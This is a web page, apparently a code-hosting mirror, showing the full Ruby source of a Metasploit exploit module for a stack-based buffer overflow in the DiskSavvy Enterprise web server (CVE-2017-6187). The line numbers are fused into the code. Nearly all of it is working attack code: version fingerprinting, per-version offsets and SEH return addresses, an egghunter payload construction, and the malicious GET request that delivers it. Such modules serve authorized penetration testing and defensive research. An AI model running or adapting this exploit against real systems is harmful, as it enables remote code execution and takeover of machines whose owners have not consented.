CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/http/disksavvy_get_bof.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Seh9include Msf::Exploit::Remote::Egghunter10include Msf::Exploit::Remote::HttpClient1112def initialize(info = {})13super(update_info(info,14'Name' => 'DiskSavvy Enterprise GET Buffer Overflow',15'Description' => %q{16This module exploits a stack-based buffer overflow vulnerability17in the web interface of DiskSavvy Enterprise v9.1.14 and v9.3.14,18caused by improper bounds checking of the request path in HTTP GET19requests sent to the built-in web server. This module has been20tested successfully on Windows XP SP3 and Windows 7 SP1.21},22'License' => MSF_LICENSE,23'Author' =>24[25'vportal', # Vulnerability discovery and PoC26'Gabor Seljan' # Metasploit module27],28'References' =>29[30['CVE', '2017-6187'],31['EDB', '40869']32],33'DefaultOptions' =>34{35'EXITFUNC' => 'thread'36},37'Platform' => 'win',38'Payload' =>39{40'BadChars' => "\x00\x09\x0a\x0d\x20",41'Space' => 50042},43'Targets' =>44[45[46'Automatic Targeting',47{48'auto' => true49}50],51[52'DiskSavvy Enterprise v9.1.14',53{54'Offset' => 542,55'Ret' => 0x101142c0 # POP # POP # RET [libspp.dll]56}57],58[59'DiskSavvy Enterprise v9.3.14',60{61'Offset' => 2478,62'Ret' => 0x101142ff # POP # POP # RET [libspp.dll]63}64]65],66'Privileged' => true,67'DisclosureDate' => '2016-12-01',68'DefaultTarget' => 0))69end7071def check72res = send_request_cgi(73'method' => 'GET',74'uri' => '/'75)7677if res && res.code == 20078version = res.body[/Disk Savvy Enterprise v[^<]*/]79if version80vprint_status("Version detected: #{version}")81if version =~ /9\.(1|3)\.14/82return Exploit::CheckCode::Appears83end84return Exploit::CheckCode::Detected85end86else87vprint_error('Unable to determine due to a HTTP connection timeout')88return Exploit::CheckCode::Unknown89end9091Exploit::CheckCode::Safe92end9394def exploit95mytarget = target9697if target['auto']98mytarget = nil99100print_status('Automatically detecting the target...')101102res = send_request_cgi(103'method' => 'GET',104'uri' => '/'105)106107if res && res.code == 200108if res.body =~ /Disk Savvy Enterprise v9\.1\.14/109mytarget = targets[1]110elsif res.body =~ /Disk Savvy Enterprise v9\.3\.14/111mytarget = targets[2]112end113end114115if !mytarget116fail_with(Failure::NoTarget, 'No matching target')117end118119print_status("Selected target: #{mytarget.name}")120end121122eggoptions = {123checksum: true,124eggtag: rand_text_alpha(4, payload_badchars)125}126127hunter, egg = generate_egghunter(128payload.encoded,129payload_badchars,130eggoptions131)132133sploit = make_nops(10)134sploit << egg135sploit << rand_text_alpha(mytarget['Offset'] - egg.length)136sploit << generate_seh_record(mytarget.ret)137sploit << make_nops(8)138sploit << hunter139sploit << rand_text_alpha(4500)140141print_status('Sending malicious request...')142143send_request_cgi(144'method' => 'GET',145'uri' => sploit146)147end148end149150151